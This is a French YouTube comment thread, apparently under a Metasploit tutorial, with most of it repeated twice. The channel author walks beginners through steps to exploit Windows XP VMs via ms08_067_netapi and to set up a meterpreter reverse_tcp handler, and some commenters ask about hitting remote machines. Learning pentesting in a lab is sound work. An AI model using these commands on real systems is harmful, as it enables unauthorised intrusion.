Salut! Je suis clairement débutant dans la sécurité informatique, et j'avais du mal à m'y mettre tellement la vue des lignes de code me mettaient la nausée mais la... Wow, tu arrives à rendre ces lignes passionnantes! merci de faire partager ta passion, et comme beaucoup d''autres j'attends avec impatience la prochaine vidéo et le blog :D bonne continuation et bon courage!
Mec si les lignes de codes te mettent la nausée t'es mal. Sinon Documentes toi, apprends un langage lis des livres entraines toi et le tour est joué. Aprés root-me,root-me,root-me...
Ah oui gael la programmation c'est OBLIGATOIRE dans ce domaine. C'est ce que j'incite a ce que tu fasse si tu comprend bien dans la 4eme vidéo. Metasploit est bien pour comprendre le fonctionnement d'une vulnérabilité facilement . Mais dans le fond il ne t'aidera pas.
Bientôt oui mais dans combien de temps je ne pourrait pas te répondre. Car j'essaye d'innover et de développer un peu plus les tutos que je souhaite créer, car rester derrière un pc et un PowerPoint à la longue tout le monde le fait. Cela prend énormément de temps mais sa en vaudra la peine je pense. Si tu veut tu peut nous rejoindre sur discord on sera ravie de t'accueillir.
Informatrix : sécurité informatique Merci de m'avoir répondu. C'est avec plaisir que je viendrais sur Discord mais ce qui mavais rebuté jusque là c'est que je peux pas être assez actif. Mais bon je verrai... Merci!!
enfin qqs un qui s'y connais et explique bien en son temps, je suis sous kali depuis qqs annnée mnt et je regrette d'avoir achetée la video msf sur alform.com car les tiens sont super, bonne continuation, ghostman.
bonjour ghostman . merci pour ton commentaire dont je répond 5 jours plus tard . je suis en congés donc j'en profite pour vous répondre et faire progresser la chaîne. pour alphorm je suis flatter de ta réponse. pourtant tu ne peut pas et moi-même me comparer à des professionnels qui ont passer des années à obtenir leurs diplômes ainsi que leur expérience dans le métier même si j'en ai aussi mais aucun diplôme) je pourrais pas le permettre de payer 2800€ ht pour passer la CEH ou 500€ pour avoir les certifications de l'offensive security. c'est pour sa je suis flatter mais je ne peut pas dire quoi que soit envers une boîte qui a des années la dedans et qui ont le monopole
Je te comprends entièrement,et peux etre que l on sais deja vu chez mickey, :-). Si on gardais contact,ce serais pas mal,echange vidéo,etc. Bien a toi...
Bonjour, lorsque je lance la session meterpreter je recois l'erreur "exploit completed but no session was created", j'ai exploré le journal de metasploit, rien de concret. Je ne sais pas si c'est ma version d'OS qui est patchée ou alors il s'agit d'un autre problème ( j'utilise la version 6 de msf et windows xp SP 3 32 bits)
cependant pour ta prochaine vidéo sur la création de payload tu pourra passer a la dernière version de kali ? Puisque msfpayload et msfencode ont été remplacer par msfvenom et la commande msfcli n'existe plus . Donc sa serais sympa de faire un tuto avec ces nouvelle ligne de commande
+loan tricaud Oui sans probleme, j'y comptait justement car je sais que si je fait la derniere partie de ce tuto sur kali 1.0 sa va poser probleme a ceux qui sont sur la 2.0. Par contre msfvenom est présent sur la 1.0. et pour ce qui concerne msfcli sur la 2.0 tu as une methode plus simple qui est d'utiliser le module " exploit/multi/handler " suivit du set PAYLOAD " le nom de ton payload " suivit de tes autres parametres. par exemple: tu as générer un payload reverse_tcp pour ouvrir une session meterpreter pour windows sur une machine virtuel que tu a installer sur ton résau local . tu te rend dans la msfconsole : tu tape use exploit/multi/handler ensuite tu fait: set PAYLOAD windows/meterpreter/reverse_tcp après tu fait un set LHOST 192.168.1.1 ( ip locale en exemple bien sur sa changera chez toi suivant ton FAI ) il te reste plus qu'a taper exploit et attendre que le payload soit demarrer sur ta machine virtuelle. As-tu a peut pres compris le principe du prochain tuto ?
+Informatrix , création , solution informatique Oui je connait déjà mais je regarde t'es vidéo car je les trouve très explicatif et elle m'apporte quelque détaille que je ne connaissait pas 😉. Merci pour tes vidéo 😃
bonjour , super votre tuto. mais j'ai un souci au niveau de l’affichage des exploits.et en effet comme sur la video jai alloué les adresses RHOST et LHOST et lorsque je tape la commande exploit ca nouvre pas meterpreter.merci
salut moi je suis au mali et ici il n'existe pas de structure de formation dans le domaine de la sécurité informatique.Franchement j'aimerais savoir s'il existe une possibilité à votre niveau de dispenser des cours en présentiel ,si oui qu'elles sont les modalités de payement.
Bonjour à toi, premièrement très bon tuto ! Deuxièmement lorsque tu tape la commande suivante; msf vulns, tu as une vulnerabilité appelée ns08-067. Lorsque je fais la même commane j'obtient Time: 2016-04-21 15:58:21 UTC Vuln: host=XXX.XXX.X.XX name=Generic Payload Handler refs= (Les X représentes l'IP, je la cache.) Et lorsque je tape; search Generic Payload Handler j'obtient une liste énorme de Payloads, Post ect. J'en ai repérer un qui correspond à sa qui ai écrit la commande vulns (Generic Payload Handler), donc voilà sa marche mais lorsque que je fais show options il se passe ça; Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Exploit target: Id Name -- ---- 0 Wildcard Target Dois-je utiliser un autre exploit, un payload ou encore autre chose ? (Je suis encore un débutant, je travail sur Kali-Linux 2) Merci d'avance Cordialement
salut Léo et merci à toi . attention ne pas confondre payload et exploit . un payload est un module de connexion direct ou inverser avec la machine cible. dans ce tuto il n'est question uniquement d'exploit . se sont des modules qui utilise une faille présente sur la machine suivant son port son services et sa version . le module exploit/multi/handler est un module decoute. par exemple dans le prochain tuto tu verras comment t'en servir grâce à la generation de payload via msfvenom . dans ce tuto ici on ne s'en sert uniquement pour implanter une persistance et comment avoir une écoute grace a lexploit/multi/handler. la commande vulns te sert à lister la liste des vulnérabilités présente sur la machine cible . ici tu a la faille ms08_067_netapi . donc un exploit disponible depuis metasploit . donc tu fait search ms08_067netapi -use "le path pour utiliser lexploit' - set Rhost " l'IP de la machine cible" - set target "l'id de la version de l'os" ( pas obligatoire ) -exploit et la tu doit avoir compromis la machine.
+Informatrix , création , solution informatique Merci beaucoup à toi mais si je tape la commande vulns et que je n'obtient pas ms08-67 je peut quand même l'utiliser ? En tout cas merci pour ta réponse rapide et précise. Cordialement
+LÉO A regarde la version de windows xp que tu as et tape la commande show targets dans le module ms08 . ou alors tu peut toujours tenter ta chance car tu peut soit avoir des faux positif ou des faux négatif donc le seul moyen c'est de tenter ta chance
+Informatrix , création , solution informatique Ok je vais essayer sa merci ! L'ordinateur cible est sous Windows 7 et j'ai l'impression que je vais devoir approfondir tout sa !
et vous n'êtes pas seul à attendre des vidéos . malheureusement jai une vue privé et une vie professionnelle comme beaucoup d'abonné sur cette chaîne donc vous attendrez comme tout le monde . la prochaine vidéo est prévu pour la semaine prochaine . en attendant si vous voulez plus de renseignements, questions ou aide je vous invite à rejoindre la page facebook et le groupe skype prévu à cet effets
bonjour. j'ai suivi avec bcp d'attention ton explication de Prof. c'est très cool!!! sauf quelques parties que j'ai pas compris à cause de mon niveau qui est très bas en informatique. je voudrais savoir ce qui se passe lorsque le systeme ne trouve pas la faille avec la commande "vulns"? et qu'en est -il d'un site( contrairement à une machine) en ce qui concerne la compromission?
Durstig Flooz bonjour , si la commande vulns ne fonctionne pas cela voudra dire que vous devrez chercher vous même en utilisant par exemple des modules auxiliaires ou de scan. concernant les compromissions de sites web cela relate des vulnérabilitées Webapp, ces types de vulnérabilités sont complètement différentes des vulnérabilitées que vous pourrez trouvez sur des système d'exploitation.
bonjour, merci pour tes tutos je voudrais savoir si cet exploit marche seulement si et seulement si vous etes sur le meme reseau local? dans le cas c'est une intruision à distance, faut il utliser "generate" et envoyer le payload à la machine victime? merci encore
Mr Tsunami c'est exactement ce que je me suis dis en début de vidéo. Il prend l'adresse locale du pc Windows xp, mais si on veut s'orienter sur une machine externe à notre réseau, l'adresse locale de 1 elle sert à rien et de deux on ne l'a pas forcément, quel adresse doit on marquer ducoup ?
Bonjour Informatrix, j'ai une petite question, sur l'ordi de ma femme j'ai détecté une prise de commande sur son ordi windob 7 avec hisjackthis je fixe tous s qu’il me dis mais je pense qu'il dois se servir de processus auriez vous une solution ? en tous cas grand merci car c'est très bien expliqué et sa fait plaisir d'avoir un tutos d'information sur kali et non pas un crack wifi ou on dois copier sans savoir se qu'on fait. Bonne continuation.
bjr tu vas dans le moniteur de ressource windows puis dans Réseau ; memoire ; processeur ect... regarde si il n'y a pas un service qui prend bcp de ressource
Tout d'abord superbe vidéo ! Ensuite j'ai un problème pour le scan nmap de ma machine virtuelle windows xp, à chaque fois que je tente de faire un scan, il retourne comme infos que l'OS est VirtualBox et non windows xp... Alors forcément les étapes suivantes ne marchent pas. Si toi ou quelqu'un d'autres aurait une solution à me proposer cela serait vraiment sympa ! :D En tout cas continue comme ça tu fait vraiment un bon boulot. ( J'ai beau essayé différent type de connexions ça ne marche pas... Je tiens à préciser que j'ai dl W xp en SP3 )
Non seulement sur Kali car sur xp dés que je veux le mettre en nat j’obtiens une adresse ip non locale dans le style 10.0.2.30. qui bien évidement me renvoie une erreur sous l'utilitaire nmap. Donc pour réussir à faire un scan sur xp je suis obliger de sélecter la méthode par pont qui me renvoie une adresse ip cohérente mais qui malheureusement ne marche pas non plus sous nmap vu qu'il détecte virtualbox comme os et non Windows xp... Merci de ta réponse plus que rapide ! :D
Ok merci de ta réponse, je testerai cela au soir ! :D Et de quel groupe parles-tu ? Tu fais allusion à la section communauté du site rootme ou alors à un autre groupe ?
Au tout début de la vidéo tu tapes une adresse ip local, mais est ce qu'on est obliger d'être dans le même réseau que la machine ou alors on peut être à distance et cela fonctionne tout de même ?
Matthieu Mick tu n'est pas forcément obliger d'être sur le même réseau de la machine cible. seulement tu n'auras sûrement pas le même résultat lors du scanner si un pare feu bloque le trafic entrant et sortant
Merci pour ce tuto ! j'ai un probleme lorsque je tape hosts pour voir si le scan a bien été enregistrer dans ma base de donnée on m'afffiche " Database not connected"
salut,pouvez vous me recommander un bon livre pour apprendre le pen-test sur les app web en français ? et merci d'avance
7 лет назад
Très bon tuto mais j'suis bloqué dès le debut, quand tu tape : db_nmap -v -sS -A (ip.locale) j'ai ce message qui s'affiche [*] Nmap: 'You requested a scan type which requires root privileges.' [*] Nmap: 'QUITTING!' c'est due a quoi?
Carotte Rapée es tu sur une session user ou root ?
7 лет назад
Informatrix : sécurité informatique une session Root, je me suis abonné et j'ai regardé toutes tes vidéos. Ils sont très bien expliqué. Et tu sais de quoi tu parles. Ca fait plaisir de tombé sur une personne passionné !
Bonsoir et merci pour tout ce que tu fais Informatix. j'aimerai savoir comment faire si la machine cible n'a pas de vulnérabilité ?? parce que j'ai fait le scan et les ports 135, 445,139 sont ouverts mais la commande "vulns" ne me montre pas de vulnérabilité. Comment faire donc
+hub le la commande vulns ne marche pas à tout les coup . Cela dépendra de l'os et de sa version et aussi du scanner nse de nmap qui lui utilise certains scripts de vulnérabilités.
Salut, merci pour la vidéo c'est super bien expliqué, mais je pense avoir un ptit soucis. Quand j'envois la commande "vulns", celle ci ne me renvois rien. Sais tu pourquoi ?
+Informatrix : sécurité informatique oui j'ai essayé ça aussi, j'ai fais vulns apres avoir fais un scan d'un ordinateur sur mon reseau, sachant que j'ai kali linux qui tourne sous machine virtuelle
+Informatrix : sécurité informatique les commandes que j'ai tapé etaient les meme que tu montre dans la video, c'est a dire : db_nmap -v -sS -A 192.168.0.30 /* qui est un ordinateur sur mon reseau local */ hosts vurnls Voila les commandes que j'ai effectué. Eh au fait j'en profite pour poser ma question, sur quoi est ce que la commande vurnls se base pour dire quelle machine scannée possede ou non des vulnerabilité ? Merci pour prendre le temps de repondre en tout cas
si tu as plusieurs machines scanner il se basera sur plusieurs Vecteurs comme l'OS ou les services ainsi que leur version . après cela ne veut pas dire que la commande vulns fonctionnera à tout les coups, sa serai trop simple sinon cela nous enlèverai le privilège de rechercher nous même les vulnérabilitées ;)
salut, me revoilà pour une nouvel question !! ^^ j'ai le même problème que Jey Husson la commande "vulns" ne m'affiche rien.....comme tu lui a conseiller, j'ai tester " db_vulns " le retour est que la commande est obsolète, j'ai donc fait un " help " pour voir les commande au cas ou....est la commande " vulns " existe bien, je suis donc censer avoir un retour quand je fait la commande mes la rien .... Aurais tu une idée ? a s'avoir que j'ai fait les même commande que toi ( bien sur avec mon IP cible) ... ma cible est Windows XP familiale Version 2002 sp2 qui tourne comme kali sous VMware et les 2 en connexion Briged. Est super vidéo , j'ai adoré l'exercice sur root_me Cordialement
Je vient aussi de me rendre compte quand tapant la commande " hosts " dans os_name ses windows 2000 qui apparais !!!! .....j'ai 2 iso windows XP et les deux sont identique en résulta......pourtant panneau de configuration / performance maintenance / System ses bien windows xp ........ Cordialement
pathinferno salut . alors non la commande vulns est facultative. tu pourras l'utiliser sur une VM sous Metasploitable 2 tu aura un résultat . mais sous une machine sous XP elle ne fonctionnera pas à tout les coup . elle aurait très bien put ne pas fonctionner chez moi. dans ce cas rien ne vaut un bon scanner de vulnérabilité comme nessus , openvas etc..... concernant la commande hosts et le windows 2000 tu n'est pas non plus le seul dans ce cas. mais ce n'est pas méchant étant donner que cette vulnérabilitées est présente aussi sur cette version de système.
ok merci bien pour t'on aide, je comprend mieux, oui j'ai sauter l’étape vulns vue que dans t'a vidéo tu explique que l'exploit ms08_067 est un exploit pour Windows xp je les tester direct !!! est sa passe :-p par contre je me poser la question : est ce que chaque Windows on des exploit comme celui la ? je suppose que non sinon trop simple......je reste impressionné par tout ce qui est possible de faire sans que la cible ne sens rende compte.......j'ai peur de mon pc maintenant !!!!!! merci et continue t'est vidéo elle sont super bien expliquer +1
Yo quand j'entre la commande "vulns" rien ne s'effectue.. de l'aide ? =) j'ai fais plein de scan sur différentes ip (avec db_nmap bien sur) mais a chaque fois vulns ne fais rien.
+daniel ou victor la commande vulns ne fonctionne pas à tout les coups. Elle a fonctionné lors de ce tutoriel mais elle aurait très bien pu ne pas fonctionner aussi. Dans tout les cas il vaut mieux toujours passer par un scanner de vulnérabilité qui te donnera plus de résultats
ok maintenant la commande marche sans problème je ne sais pas pourquoi. Mais es-ce qu'il un moyen de trouver l'exploit (ici MS08-067) autre que "vulns" ? On dirait que pour toi cette commande est optionnelle alors que pour moi c'est le seul moyen de trouver l'exploit.
daniel ou victor comme je t'avais dit précédemment . tu peux sois passer par un scanner de vulnérabilités ou effectuer tes propres recherches via une base d'exploit publique afin de savoir si une vulnérabilités est disponible,de comprendre son fonctionnement et à partir de quel langage a t-elle été ( voir 4eme vidéo ). cest comme cela que tu pourras te passer de la commande vulns qui est très "capricieuse".
c'est inclus dans le tutoriel ne t'en fait pas . déjà root-me.org c'est bien pour ceux qui veulent prendre la main. pour ce qui est des payloads à travers le net on y viendra aussi ce n'est pas compliqué du tout. merci
Salut je suis débutant mais j'ai remarqué un problème quand je fais des scans, le truc c'est que les scan ne s'enregistre pas quand je vais voir dans Hosts. Je voulais savoir comment résoudre ça. Merci de ta réponse
+Informatrix , création , solution informat par exemple un pc de une personne distante, un ami a moi souhaiterait tester son ordinateur aux failles et il voudrait donc que je fasse un test d'intrusion, pour cela je dois seulement lui demander son adresse ip ? ou autre chose ?
+ultime accrocraft tout depend de ce que tu veut faire , si tu veut que ton pentest soit baser sur du whitebox du blackbox ou greybox,. -Si tu veut que ton pentest soit baser que sur du BlackBox donc a l'aveugle , tu devras te debrouiller tout seul du debut a la fin , c'est a dire lors de ta phase de collecte d'informations active et passive , pendant la recherche de faille et sur l'exploitation de la machine distante pour ensuite etablir des solutions afin de renforcer la securite -Si tu veut que ton pentest sois baser sur du WhiteBox , ton amis te donnera la totalitee des informations que tu auras besoin pour proceder a l'exploitation pour ensuite etablir des solutions afin de renforcer la securite -Et enfin le GreyBox je ne te fait pas de dessin , voir la premiere et la deuxieme solution , ton amis te donnera des informations limitee; et tu devras te debrouiller pour la suite pour finir par etablir des solutions afin de renforcer la securite Si tu n'as pas regarder la premiere partie de ce chapitre concernant les bases et la recherches de vulnerabilitees je te conseil d'aller la voir avant de passer a la suite. Ps : N'oublie pas d'avoir l'accord écrit et signer de la personnes chez qui tu vas etablir le pentest
+Informatrix , création , solution informatique tout d'abord merci de m'avoir bien expliquer :) et répondu a ma question je tiens compte de tous cela, et je comprend que il faut une preuve écrite en cas de problème ensuite. Même si mon ami peut me donner toutes les infos nécessaire je préfère essayer de moi même et voir si je peux y arriver ( a fin de tester mes capacité et m'améliorer) cependant si je n'y arrive pas je lui demander de mes donnée toutes les infos :) J'ai une dernière question : pour réaliser un pentest de une machine , avec seulement l'adresse ip de celle-ci est t'il possible de le réaliser ? peut-on lancé un scan (nmap ect...) avec l'adresse ip de la victime ? ps: désolée de toutes ces questions :)
bonjour. je n'ai fait aucune étude dans l'informatique. j'ai tout appris de moi même en prenant le temps de faire des recherches sur le net .lire des livres et de la documentations. pourquoi ? tu recherches à faire des études dans la sécurité ?
Oui, en effet je suis en seconde et la sécurité informatique, m’intéresse malgré cela je ne suis pas très fort en math, donc je me suis réoriente vers un bac ES je sais que ce n'est pas le meilleur bac mais je sais que en S je ne pourrais pas suivre. Donc c'est pour ça que je voulais vous demander quel étude vous avez fais (mais si vous avez des information à se sujet je suis preneur)
Si c'est comme l'Onisep oui, je me suis déjà renseigné la seul chose que je n'arrive pas à trouvé c'est si il est possible d'aller dans une école de sécurité informatique avec un bac ES, d'où ma demande
Je voudrais te demander une dernière chose, as-tu des livres ou de la documentation à me conseiller qui sont intéressent sur metasloit, test d’intrusion ou autre chose que l'on peut trouver dans le commerce
Deja, il y a un premier probleme, le pare feu est sans doute activer, mais surtout, les antis virus + mises a jours auto rendent ce genre d'attaques plus compliqués. Essaye deja de desactiver le pare feu, et vois si tu peux avancer. Sinon, installes une machine virtuelle windows XP et utilise un reseau NAT
Déjà merci pour tes vidéos super intéressantes Et j'ai un petit problème super important J'ai cherché partout la solution en vain En téléchargeant win Xp sous vmware , Il m'affiche au moment du chargement "OPERATING SYSTEM NOT FOUND" J'ai essayé plusieurs ISO mais rien ne marche. Et oui j'ai bien coché la case " USE ISO IMAGE FILES" dans les settings Et sur internet il propose d'installer des logiciel chelou qui soit disant "résolve" le problème Aide moi s'il te plait car sans la machine XP je ne peux pas commencer ce tuto bye
ikkeeeurss parce que la commande vulns ne fonctionne pas avec tout les systèmes d'exploitation. si tu veux de bons résultats lors d'une analyse de vulnérabilité privilégie des scanner de vulnérabilité comme openvas ou nessus avant de passer à l'exploitation
+Valentin a tu mis à jour ta distribution ? Et est ce que ta sources.list est correct ? Et est ce que tu démarre bien le service postgresql et cliquez sur l'icône de metasploit lors de la première utilisation afin qu'il puisse créer les dB ?
Ma distribution et bien a jour pour la sources.list je ne c'est pas le service postgresql aussi je ne c'est pas car je suis sous 2.0 et oui j'ai bien cliqué la première fois sur l'icone de metasploit
+Valentin comment tu peut savoir si ta distribution est bien à jour si tu n'a pas modifier la sources.list afin d'ajouter les dépôts de kali . D'ailleurs tu fait bien de me le dire sa va me permettre de faire un tutoriel de soutien pour les base d'utilisation de linux car tu n'es pas tout seul dans ce cas. Concernant le service postgresql commence par la première vidéo.
Informatrix : sécurité informatique J'ai la version v4.13.20-dev de metasploit (ps quand je fait db_status il me mes postgresql connected to msf ) ps quand je fait service metasploit start il me met l'erreur Failed to start metasploit.service: Unit metasploit.service not found. HELP !
Salut! Je suis clairement débutant dans la sécurité informatique, et j'avais du mal à m'y mettre tellement la vue des lignes de code me mettaient la nausée mais la... Wow, tu arrives à rendre ces lignes passionnantes! merci de faire partager ta passion, et comme beaucoup d''autres j'attends avec impatience la prochaine vidéo et le blog :D
bonne continuation et bon courage!
Mec si les lignes de codes te mettent la nausée t'es mal.
Sinon Documentes toi, apprends un langage lis des livres entraines toi et le tour est joué.
Aprés root-me,root-me,root-me...
Ah oui gael la programmation c'est OBLIGATOIRE dans ce domaine. C'est ce que j'incite a ce que tu fasse si tu comprend bien dans la 4eme vidéo. Metasploit est bien pour comprendre le fonctionnement d'une vulnérabilité facilement . Mais dans le fond il ne t'aidera pas.
+Informatrix tu penses poster bientot ??
Bientôt oui mais dans combien de temps je ne pourrait pas te répondre. Car j'essaye d'innover et de développer un peu plus les tutos que je souhaite créer, car rester derrière un pc et un PowerPoint à la longue tout le monde le fait. Cela prend énormément de temps mais sa en vaudra la peine je pense. Si tu veut tu peut nous rejoindre sur discord on sera ravie de t'accueillir.
Informatrix : sécurité informatique
Merci de m'avoir répondu.
C'est avec plaisir que je viendrais sur Discord mais ce qui mavais rebuté jusque là c'est que je peux pas être assez actif.
Mais bon je verrai...
Merci!!
Superbe ! bien expliqué :) un grand merci pour ce partage de connaissance.
merci du soutiens , n'hésitez pas à rejoindre le groupe skype pour plus d'entraide
enfin qqs un qui s'y connais et explique bien en son temps,
je suis sous kali depuis qqs annnée mnt et je regrette d'avoir achetée la video msf sur alform.com car les tiens sont super,
bonne continuation,
ghostman.
bonjour ghostman .
merci pour ton commentaire dont je répond 5 jours plus tard . je suis en congés donc j'en profite pour vous répondre et faire progresser la chaîne.
pour alphorm je suis flatter de ta réponse. pourtant tu ne peut pas et moi-même me comparer à des professionnels qui ont passer des années à obtenir leurs diplômes ainsi que leur expérience dans le métier même si j'en ai aussi mais aucun diplôme) je pourrais pas le permettre de payer 2800€ ht pour passer la CEH ou 500€ pour avoir les certifications de l'offensive security.
c'est pour sa je suis flatter mais je ne peut pas dire quoi que soit envers une boîte qui a des années la dedans et qui ont le monopole
Je te comprends entièrement,et peux etre que l on sais deja vu chez mickey, :-). Si on gardais contact,ce serais pas mal,echange vidéo,etc. Bien a toi...
pas de soucis regarde dans la première vidéo dans les commentaires tu as mon email et mon skype
Bonjour, lorsque je lance la session meterpreter je recois l'erreur "exploit completed but no session was created", j'ai exploré le journal de metasploit, rien de concret. Je ne sais pas si c'est ma version d'OS qui est patchée ou alors il s'agit d'un autre problème ( j'utilise la version 6 de msf et windows xp SP 3 32 bits)
Vraiment votre video est très bien faite et bien expliquée
Merci beaucoup fréro pour l'explication
Merci encore pour ce tuto, il est très bien fait
Super vidéo ! hâte de voir la prochaine vidéo ! 😉
Très bonne vidéo je la conseille !! +1 pouce bleu
cependant pour ta prochaine vidéo sur la création de payload tu pourra passer a la dernière version de kali ? Puisque msfpayload et msfencode ont été remplacer par msfvenom et la commande msfcli n'existe plus . Donc sa serais sympa de faire un tuto avec ces nouvelle ligne de commande
+loan tricaud Oui sans probleme, j'y comptait justement car je sais que si je fait la derniere partie de ce tuto sur kali 1.0 sa va poser probleme a ceux qui sont sur la 2.0.
Par contre msfvenom est présent sur la 1.0. et pour ce qui concerne msfcli sur la 2.0 tu as une methode plus simple qui est d'utiliser le module " exploit/multi/handler " suivit du set PAYLOAD " le nom de ton payload " suivit de tes autres parametres.
par exemple:
tu as générer un payload reverse_tcp pour ouvrir une session meterpreter pour windows sur une machine virtuel que tu a installer sur ton résau local .
tu te rend dans la msfconsole :
tu tape use exploit/multi/handler
ensuite tu fait: set PAYLOAD windows/meterpreter/reverse_tcp
après tu fait un set LHOST 192.168.1.1 ( ip locale en exemple bien sur sa changera chez toi suivant ton FAI )
il te reste plus qu'a taper exploit et attendre que le payload soit demarrer sur ta machine virtuelle.
As-tu a peut pres compris le principe du prochain tuto ?
+Informatrix , création , solution informatique
Oui je connait déjà mais je regarde t'es vidéo car je les trouve très explicatif et elle m'apporte quelque détaille que je ne connaissait pas 😉.
Merci pour tes vidéo 😃
+loan tricaud je serai sur skype ce soir si tu veu mp mon pseudo est Fre4ks_3xpl0it
Informatrix : sécurité informatique salut g un probleme il me dit "exploit succefull but no session"
+Veugeutaahh le Prince des séian c'est pas un problème c'est juste que tu n'a pas de session ouverte sur la machine distante.
bonjour , super votre tuto. mais j'ai un souci au niveau de l’affichage des exploits.et en effet comme sur la video jai alloué les adresses RHOST et LHOST et lorsque je tape la commande exploit ca nouvre pas meterpreter.merci
J'ai adoré mec mais tu fais des très bonnes vidéos mais ça fait longtemps que je vois plus de nouveautés tu as arrêté ?
Merci. Non je n'ai pas arrêter mais beaucoup pris sur le plan professionnel. J'ai un nouveau micro je vais relancer la machine.
Ah je vois. Courage
@@informatrixsecuriteinforma6057 enfin ça fait longtemps
salut moi je suis au mali et ici il n'existe pas de structure de formation dans le domaine de la sécurité informatique.Franchement j'aimerais savoir s'il existe une possibilité à votre niveau de dispenser des cours en présentiel ,si oui qu'elles sont les modalités de payement.
Bonjour à toi, premièrement très bon tuto !
Deuxièmement lorsque tu tape la commande suivante; msf vulns, tu as une vulnerabilité appelée ns08-067. Lorsque je fais la même commane j'obtient Time: 2016-04-21 15:58:21 UTC Vuln: host=XXX.XXX.X.XX name=Generic Payload Handler refs= (Les X représentes l'IP, je la cache.) Et lorsque je tape; search Generic Payload Handler j'obtient une liste énorme de Payloads, Post ect. J'en ai repérer un qui correspond à sa qui ai écrit la commande vulns (Generic Payload Handler), donc voilà sa marche mais lorsque que je fais show options il se passe ça;
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Wildcard Target
Dois-je utiliser un autre exploit, un payload ou encore autre chose ? (Je suis encore un débutant, je travail sur Kali-Linux 2)
Merci d'avance
Cordialement
salut Léo et merci à toi .
attention ne pas confondre payload et exploit . un payload est un module de connexion direct ou inverser avec la machine cible. dans ce tuto il n'est question uniquement d'exploit . se sont des modules qui utilise une faille présente sur la machine suivant son port son services et sa version .
le module exploit/multi/handler est un module decoute.
par exemple dans le prochain tuto tu verras comment t'en servir grâce à la generation de payload via msfvenom .
dans ce tuto ici on ne s'en sert uniquement pour implanter une persistance et comment avoir une écoute grace a lexploit/multi/handler.
la commande vulns te sert à lister la liste des vulnérabilités présente sur la machine cible . ici tu a la faille ms08_067_netapi . donc un exploit disponible depuis metasploit .
donc tu fait search ms08_067netapi
-use "le path pour utiliser lexploit'
- set Rhost " l'IP de la machine cible"
- set target "l'id de la version de l'os" ( pas obligatoire )
-exploit
et la tu doit avoir compromis la machine.
+Informatrix , création , solution informatique Merci beaucoup à toi mais si je tape la commande vulns et que je n'obtient pas ms08-67 je peut quand même l'utiliser ?
En tout cas merci pour ta réponse rapide et précise.
Cordialement
+LÉO A regarde la version de windows xp que tu as et tape la commande show targets dans le module ms08 . ou alors tu peut toujours tenter ta chance car tu peut soit avoir des faux positif ou des faux négatif donc le seul moyen c'est de tenter ta chance
+Informatrix , création , solution informatique Ok je vais essayer sa merci !
L'ordinateur cible est sous Windows 7 et j'ai l'impression que je vais devoir approfondir tout sa !
+LÉO A je te conseil de te trouver une ISO de windows XP et de suivre le tuto avec pour mener a bien le tuto
salut et merci pour ton tuto très bon boulo gg continue
yo je comprends pas comment tu peux trouver la vulnérabilitée Ms08067 sans la commande vulns
j'ai télécharger une machine virtuel(vm) sur khali linux et j'aimerez que vous faîtes plus de vidéos sur ce os en sécuriter informatique
est ce que vous avez au moin prit le temps de voir déjà les vidéos disponible ainsi que la mise en pratique ?
et vous n'êtes pas seul à attendre des vidéos . malheureusement jai une vue privé et une vie professionnelle comme beaucoup d'abonné sur cette chaîne donc vous attendrez comme tout le monde . la prochaine vidéo est prévu pour la semaine prochaine . en attendant si vous voulez plus de renseignements, questions ou aide je vous invite à rejoindre la page facebook et le groupe skype prévu à cet effets
bonjour. j'ai suivi avec bcp d'attention ton explication de Prof. c'est très cool!!! sauf quelques parties que j'ai pas compris à cause de mon niveau qui est très bas en informatique. je voudrais savoir ce qui se passe lorsque le systeme ne trouve pas la faille avec la commande "vulns"? et qu'en est -il d'un site( contrairement à une machine) en ce qui concerne la compromission?
Durstig Flooz bonjour , si la commande vulns ne fonctionne pas cela voudra dire que vous devrez chercher vous même en utilisant par exemple des modules auxiliaires ou de scan.
concernant les compromissions de sites web cela relate des vulnérabilitées Webapp, ces types de vulnérabilités sont complètement différentes des vulnérabilitées que vous pourrez trouvez sur des système d'exploitation.
bonjour, merci pour tes tutos
je voudrais savoir si cet exploit marche seulement si et seulement si vous etes sur le meme reseau local?
dans le cas c'est une intruision à distance, faut il utliser "generate" et envoyer le payload à la machine victime?
merci encore
Mr Tsunami c'est exactement ce que je me suis dis en début de vidéo. Il prend l'adresse locale du pc Windows xp, mais si on veut s'orienter sur une machine externe à notre réseau, l'adresse locale de 1 elle sert à rien et de deux on ne l'a pas forcément, quel adresse doit on marquer ducoup ?
Bonjour Informatrix, j'ai une petite question, sur l'ordi de ma femme j'ai détecté une prise de commande sur son ordi windob 7 avec hisjackthis je fixe tous s qu’il me dis mais je pense qu'il dois se servir de processus auriez vous une solution ? en tous cas grand merci car c'est très bien expliqué et sa fait plaisir d'avoir un tutos d'information sur kali et non pas un crack wifi ou on dois copier sans savoir se qu'on fait. Bonne continuation.
bjr tu vas dans le moniteur de ressource windows puis dans Réseau ; memoire ; processeur ect... regarde si il n'y a pas un service qui prend bcp de ressource
Tout d'abord superbe vidéo ! Ensuite j'ai un problème pour le scan nmap de ma machine virtuelle windows xp, à chaque fois que je tente de faire un scan, il retourne comme infos que l'OS est VirtualBox et non windows xp... Alors forcément les étapes suivantes ne marchent pas. Si toi ou quelqu'un d'autres aurait une solution à me proposer cela serait vraiment sympa ! :D En tout cas continue comme ça tu fait vraiment un bon boulot. ( J'ai beau essayé différent type de connexions ça ne marche pas... Je tiens à préciser que j'ai dl W xp en SP3 )
Alessandro Pozzi tes deux machine sont en NAT ?
Non seulement sur Kali car sur xp dés que je veux le mettre en nat j’obtiens une adresse ip non locale dans le style 10.0.2.30. qui bien évidement me renvoie une erreur sous l'utilitaire nmap. Donc pour réussir à faire un scan sur xp je suis obliger de sélecter la méthode par pont qui me renvoie une adresse ip cohérente mais qui malheureusement ne marche pas non plus sous nmap vu qu'il détecte virtualbox comme os et non Windows xp... Merci de ta réponse plus que rapide ! :D
tente de passer sous vmware , sa te facilitera la tache ;) si tu as besoin rejoint le groupe pour une aide personalisé ;)
Ok merci de ta réponse, je testerai cela au soir ! :D Et de quel groupe parles-tu ? Tu fais allusion à la section communauté du site rootme ou alors à un autre groupe ?
Au tout début de la vidéo tu tapes une adresse ip local, mais est ce qu'on est obliger d'être dans le même réseau que la machine ou alors on peut être à distance et cela fonctionne tout de même ?
